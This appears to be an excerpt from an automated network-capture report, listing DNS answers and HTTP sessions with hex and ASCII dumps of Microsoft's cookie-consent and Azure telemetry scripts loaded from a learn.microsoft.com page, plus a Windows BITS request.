May 26, 2024 09:47:08.056246996 CEST	1.1.1.1	192.168.2.6	0x5c27	No error (0)	part-0032.t-0009.t-msedge.net		13.107.213.60	A (IP address)	IN (0x0001)	false
May 26, 2024 09:47:08.066211939 CEST	1.1.1.1	192.168.2.6	0x8df6	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:08.069523096 CEST	1.1.1.1	192.168.2.6	0xea43	No error (0)	js.monitor.azure.com	aijscdn2.azureedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:09.275506973 CEST	1.1.1.1	192.168.2.6	0x2028	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
May 26, 2024 09:47:09.275583029 CEST	1.1.1.1	192.168.2.6	0x6388	No error (0)	www.google.com			65	IN (0x0001)	false
May 26, 2024 09:47:12.636177063 CEST	1.1.1.1	192.168.2.6	0xf07	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:12.636193037 CEST	1.1.1.1	192.168.2.6	0x22ec	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:16.143353939 CEST	1.1.1.1	192.168.2.6	0xb4ec	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:16.143367052 CEST	1.1.1.1	192.168.2.6	0x78d7	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:19.343944073 CEST	1.1.1.1	192.168.2.6	0x7e19	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:19.344010115 CEST	1.1.1.1	192.168.2.6	0xb7a	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:48:13.863930941 CEST	1.1.1.1	192.168.2.6	0x30e8	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:48:13.863951921 CEST	1.1.1.1	192.168.2.6	0x7adb	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:08 UTC	551	OUT	GET /mscc/lib/v2/wcp-consent.js HTTP/1.1 Host: wcpstatic.microsoft.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 07:47:08 UTC	712	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 07:47:08 GMT Content-Type: application/javascript Content-Length: 52717 Connection: close Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding Age: 9501 Cache-Control: max-age=43200 Content-MD5: QT/MdZzBmCG2G2lBgIsptQ== Etag: 0x8DA85F6F74C6D08 Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT Vary: Accept-Encoding X-Cache: CONFIG_NOCACHE x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 821e4baf-901e-0029-202a-afdbdf000000 x-ms-version: 2009-09-19 x-azure-ref: 20240526T074708Z-16f669959b4gz86b1uee05t9pw00000008rg000000008vff Accept-Ranges: bytes
2024-05-26 07:47:08 UTC	15672	IN	Data Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
2024-05-26 07:47:08 UTC	16384	IN	Data Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65 Data Ascii: {return e?e.replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">").replace(/"/g,""").replace(/'/g,"'"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
2024-05-26 07:47:08 UTC	710	IN	Data Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
2024-05-26 07:47:09 UTC	3567	IN	Data Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n\|\|n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:08 UTC	549	OUT	GET /scripts/c/ms.jsll-3.min.js HTTP/1.1 Host: js.monitor.azure.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 07:47:08 UTC	960	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 07:47:08 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 185160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=1800, immutable, no-transform Last-Modified: Mon, 25 Mar 2024 17:36:27 GMT ETag: 0x8DC4CF219992427 x-ms-request-id: cc5e689c-701e-0079-3917-aa648d000000 x-ms-version: 2009-09-19 x-ms-meta-jssdkver: 3.2.17 x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-3.2.17.min.js Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240526T074708Z-16f669959b4k284257wnqd0qt800000001c000000000006x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-05-26 07:47:08 UTC	15424	IN	Data Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 33 2e 32 2e 31 37 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 Data Ascii: /! 1DS JSLL SKU, 3.2.17 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&def
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 39 36 37 32 39 35 7c 33 26 74 29 3e 3e 3e 30 2c 6e 3d 30 29 3b 72 65 74 75 72 6e 20 72 7d 76 61 72 20 57 72 3d 65 2c 47 72 3d 22 32 2e 38 2e 31 38 22 2c 58 72 3d 22 2e 22 2b 4b 72 28 36 29 2c 51 72 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 4a 72 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 5b 4d 5d 7c 7c 39 3d 3d 3d 65 5b 4d 5d 7c 7c 21 2b 65 5b 4d 5d 7d 66 75 6e 63 74 69 6f 6e 20 59 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4d 74 28 65 2b 51 72 2b 2b 2b 28 28 74 3d 76 6f 69 64 20 30 21 3d 3d 74 26 26 74 29 3f 22 2e 22 2b 47 72 3a 70 29 2b 58 72 29 7d 66 75 6e 63 74 69 6f 6e 20 24 72 28 65 29 7b 76 61 72 20 61 3d 7b 69 64 3a 59 72 28 22 5f 61 69 44 61 74 61 2d 22 2b 28 65 7c 7c 70 29 2b 22 2e 22 2b 47 72 29 2c 61 63 63 65 70 74 3a 4a 72 2c 67 65 74 3a 66 75 Data Ascii: 967295\|3&t)>>>0,n=0);return r}var Wr=e,Gr="2.8.18",Xr="."+Kr(6),Qr=0;function Jr(e){return 1===e[M]\|\|9===e[M]\|\|!+e[M]}function Yr(e,t){return Mt(e+Qr+++((t=void 0!==t&&t)?"."+Gr:p)+Xr)}function $r(e){var a={id:Yr("_aiData-"+(e\|\|p)+"."+Gr),accept:Jr,get:fu
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 2c 68 5b 51 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 4e 26 26 74 6e 28 55 61 29 2c 68 5b 68 65 5d 28 29 26 26 74 6e 28 22 43 6f 72 65 20 73 68 6f 75 6c 64 20 6e 6f 74 20 62 65 20 69 6e 69 74 69 61 6c 69 7a 65 64 20 6d 6f 72 65 20 74 68 61 6e 20 6f 6e 63 65 22 29 2c 43 3d 65 7c 7c 7b 7d 2c 68 5b 76 65 5d 3d 43 2c 59 28 65 5b 6d 65 5d 29 26 26 74 6e 28 22 50 6c 65 61 73 65 20 70 72 6f 76 69 64 65 20 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 20 6b 65 79 22 29 2c 69 3d 72 2c 68 5b 4c 61 5d 3d 72 3b 65 3d 5a 74 28 43 2e 64 69 73 61 62 6c 65 44 62 67 45 78 74 29 2c 21 30 3d 3d 3d 65 26 26 50 26 26 28 69 5b 49 65 5d 28 50 29 2c 50 3d 6e 75 6c 6c 29 2c 69 26 26 21 50 26 26 21 30 21 3d 3d 65 26 26 28 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b Data Ascii: ,h[Q]=function(e,t,n,r){N&&tn(Ua),h[he]()&&tn("Core should not be initialized more than once"),C=e\|\|{},h[ve]=C,Y(e[me])&&tn("Please provide instrumentation key"),i=r,h[La]=r;e=Zt(C.disableDbgExt),!0===e&&P&&(i[Ie](P),P=null),i&&!P&&!0!==e&&(P=function(e){
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 6f 6e 20 4b 73 28 65 29 7b 76 61 72 20 74 2c 6e 3d 6e 75 6c 6c 3b 69 66 28 65 29 74 72 79 7b 65 5b 4c 73 5d 3f 6e 3d 7a 73 28 65 5b 4c 73 5d 29 3a 65 5b 4d 73 5d 26 26 65 5b 4d 73 5d 5b 4c 73 5d 3f 6e 3d 7a 73 28 65 5b 4d 73 5d 5b 4c 73 5d 29 3a 65 2e 65 78 63 65 70 74 69 6f 6e 26 26 65 2e 65 78 63 65 70 74 69 6f 6e 5b 4c 73 5d 3f 6e 3d 7a 73 28 65 2e 65 78 63 65 70 74 69 6f 6e 5b 4c 73 5d 29 3a 6a 73 28 65 29 3f 6e 3d 65 3a 6a 73 28 65 5b 55 73 5d 29 3f 6e 3d 65 5b 55 73 5d 3a 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6f 70 65 72 61 26 26 65 5b 48 73 5d 3f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 65 5b 77 6f 5d 28 22 5c 6e 22 29 2c 72 3d 30 3b 72 3c 6e 5b 68 5d 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 6e 5b 72 Data Ascii: on Ks(e){var t,n=null;if(e)try{e[Ls]?n=zs(e[Ls]):e[Ms]&&e[Ms][Ls]?n=zs(e[Ms][Ls]):e.exception&&e.exception[Ls]?n=zs(e.exception[Ls]):js(e)?n=e:js(e[Us])?n=e[Us]:window&&window.opera&&e[Hs]?n=function(e){for(var t=[],n=e[wo]("\n"),r=0;r<n[h];r++){var i=n[r
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 6b 54 72 61 63 65 20 66 61 69 6c 65 64 2c 20 74 72 61 63 65 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 76 28 72 29 2c 7b 65 78 63 65 70 74 69 6f 6e 3a 73 65 28 72 29 7d 29 7d 7d 2c 53 2e 74 72 61 63 6b 4d 65 74 72 69 63 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 72 79 7b 76 61 72 20 6e 3d 54 63 28 65 2c 74 63 5b 52 63 5d 2c 74 63 5b 4d 63 5d 2c 53 5b 4c 63 5d 28 29 2c 74 29 3b 53 5b 47 5d 5b 55 63 5d 28 6e 29 7d 63 61 74 63 68 28 72 29 7b 64 28 31 2c 33 36 2c 22 74 72 61 63 6b 4d 65 74 72 69 63 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 76 28 72 29 2c 7b 65 78 63 65 70 74 69 6f 6e 3a 73 65 28 72 29 7d 29 7d 7d 2c 53 5b 56 63 5d 3d 66 75 Data Ascii: kTrace failed, trace will not be collected: "+v(r),{exception:se(r)})}},S.trackMetric=function(e,t){try{var n=Tc(e,tc[Rc],tc[Mc],S[Lc](),t);S[G][Uc](n)}catch(r){d(1,36,"trackMetric failed, metric will not be collected: "+v(r),{exception:se(r)})}},S[Vc]=fu
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 7c 4c 74 28 72 2c 22 2f 22 29 29 26 26 28 61 2e 73 79 6e 63 3d 33 29 29 2c 65 26 26 28 61 2e 74 61 72 67 65 74 55 72 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 22 3b 73 77 69 74 63 68 28 74 2e 74 61 67 4e 61 6d 65 29 7b 63 61 73 65 22 41 22 3a 63 61 73 65 22 41 52 45 41 22 3a 65 3d 74 2e 68 72 65 66 7c 7c 22 22 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4d 47 22 3a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 76 61 72 20 65 3d 4d 75 28 74 2c 4c 75 29 3b 69 66 28 65 26 26 31 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 7b 69 66 28 65 5b 30 5d 2e 68 72 65 66 29 72 65 74 75 72 6e 20 65 5b 30 5d 2e 68 72 65 66 3b 69 66 28 65 5b 30 5d 2e 73 72 63 29 72 65 74 75 72 6e 20 65 5b 30 5d 2e 73 72 63 7d 7d 72 65 74 75 72 6e 22 22 7d 28 29 3b 62 72 Data Ascii: \|Lt(r,"/"))&&(a.sync=3)),e&&(a.targetUri=function(t){var e="";switch(t.tagName){case"A":case"AREA":e=t.href\|\|"";break;case"IMG":e=function(){if(t){var e=Mu(t,Lu);if(e&&1===e.length){if(e[0].href)return e[0].href;if(e[0].src)return e[0].src}}return""}();br
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 72 79 28 65 2c 74 29 7d 2c 66 2e 74 72 61 63 6b 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 6e 2e 6c 61 74 65 6e 63 79 3d 6e 2e 6c 61 74 65 6e 63 79 7c 7c 31 2c 6e 2e 62 61 73 65 44 61 74 61 3d 6e 2e 62 61 73 65 44 61 74 61 7c 7c 7b 7d 2c 6e 2e 64 61 74 61 3d 6e 2e 64 61 74 61 7c 7c 7b 7d 2c 75 65 28 65 29 26 26 65 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6e 2e 64 61 74 61 5b 65 5d 3d 74 7d 29 2c 66 2e 63 6f 72 65 2e 74 72 61 63 6b 28 6e 29 7d 2c 66 2e 74 72 61 63 6b 50 61 67 65 56 69 65 77 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 49 2e 5f 72 65 63 6f 72 64 54 69 6d 65 53 70 61 6e 28 22 64 77 65 6c 6c 54 69 6d 65 22 2c 21 31 29 2c 54 2e 76 3d 30 2c 69 3d 21 31 2c 66 2e 69 64 2e 69 6e 69 74 69 61 6c 69 7a 65 49 64 73 28 29 Data Ascii: ry(e,t)},f.trackEvent=function(n,e){n.latency=n.latency\|\|1,n.baseData=n.baseData\|\|{},n.data=n.data\|\|{},ue(e)&&ee(e,function(e,t){n.data[e]=t}),f.core.track(n)},f.trackPageView=function(e,t){I._recordTimeSpan("dwellTime",!1),T.v=0,i=!1,f.id.initializeIds()
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 65 72 43 61 73 65 28 29 3d 3d 69 29 7b 6e 3d 21 30 3b 62 72 65 61 6b 7d 7d 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 56 66 28 65 2c 74 2c 6e 2c 72 29 7b 74 26 26 6e 26 26 30 3c 6e 2e 6c 65 6e 67 74 68 26 26 28 72 26 26 4f 66 5b 74 5d 3f 28 65 2e 68 64 72 73 5b 4f 66 5b 74 5d 5d 3d 6e 2c 65 2e 75 73 65 48 64 72 73 3d 21 30 29 3a 65 2e 75 72 6c 2b 3d 22 26 22 2b 74 2b 22 3d 22 2b 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 48 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 48 74 28 74 29 3f 65 3d 5b 74 5d 2e 63 6f 6e 63 61 74 28 65 29 3a 46 28 74 29 26 26 28 65 3d 74 2e 63 6f 6e 63 61 74 28 65 29 29 29 2c 65 7d 4d 66 28 63 66 2c 63 66 2c 21 31 29 2c 4d 66 28 6e 66 2c 6e 66 29 2c 4d 66 28 72 66 2c 22 43 6c 69 65 6e 74 2d 49 64 22 29 2c 4d 66 28 Data Ascii: erCase()==i){n=!0;break}}}return n}function Vf(e,t,n,r){t&&n&&0<n.length&&(r&&Of[t]?(e.hdrs[Of[t]]=n,e.useHdrs=!0):e.url+="&"+t+"="+n)}function Hf(e,t){return t&&(Ht(t)?e=[t].concat(e):F(t)&&(e=t.concat(e))),e}Mf(cf,cf,!1),Mf(nf,nf),Mf(rf,"Client-Id"),Mf(
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 61 74 68 2e 63 65 69 6c 28 72 29 2a 74 5b 31 5d 29 2c 30 3c 3d 6e 26 26 30 3c 3d 74 5b 31 5d 26 26 6e 3e 74 5b 31 5d 26 26 28 6e 3d 74 5b 31 5d 29 2c 74 2e 70 75 73 68 28 6e 29 2c 42 5b 65 5d 3d 74 29 7d 29 7d 2c 6c 2e 66 6c 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 21 30 29 2c 55 7c 7c 28 6e 3d 6e 7c 7c 31 2c 65 3f 6e 75 6c 6c 3d 3d 4c 3f 28 63 28 29 2c 6d 28 31 2c 30 2c 6e 29 2c 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 3d 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 61 28 31 2c 30 2c 74 29 2c 76 28 29 2c 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 44 2e 69 73 43 6f 6d 70 6c 65 74 65 6c 79 49 64 6c 65 28 29 3f 65 28 29 3a 4c 3d 73 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c Data Ascii: ath.ceil(r)*t[1]),0<=n&&0<=t[1]&&n>t[1]&&(n=t[1]),t.push(n),B[e]=t)})},l.flush=function(e,t,n){void 0===e&&(e=!0),U\|\|(n=n\|\|1,e?null==L?(c(),m(1,0,n),L=s(function(){L=null,function r(e,t){a(1,0,t),v(),function n(e){D.isCompletelyIdle()?e():L=s(function(){L
2024-05-26 07:47:09 UTC	16384	IN	Data Raw: 28 29 7d 7d 29 2c 65 7d 74 28 73 70 2c 61 70 3d 43 74 29 2c 73 70 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 63 70 3d 73 70 3b 66 75 6e 63 74 69 6f 6e 20 75 70 28 74 29 7b 76 61 72 20 6e 3d 70 6f 28 29 2c 72 3d 74 61 28 29 3b 72 65 28 75 70 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 67 65 74 54 72 61 63 65 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 26 26 74 2e 67 65 74 54 72 61 63 65 43 74 78 26 26 74 2e 67 65 74 54 72 61 63 65 43 74 78 28 29 2e 67 65 74 54 72 61 63 65 49 64 28 29 7c 7c 72 7d 2c 65 2e 67 65 74 4c 61 73 74 50 61 67 65 56 69 65 77 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 29 7d 75 70 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 6c 70 3d 75 70 2c 66 70 3d 22 64 75 72 61 Data Ascii: ()}}),e}t(sp,ap=Ct),sp.__ieDyn=1;var cp=sp;function up(t){var n=po(),r=ta();re(up,this,function(e){e.getTraceId=function(){return t&&t.getTraceCtx&&t.getTraceCtx().getTraceId()\|\|r},e.getLastPageViewId=function(){return n}})}up.__ieDyn=1;var lp=up,fp="dura

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:10 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
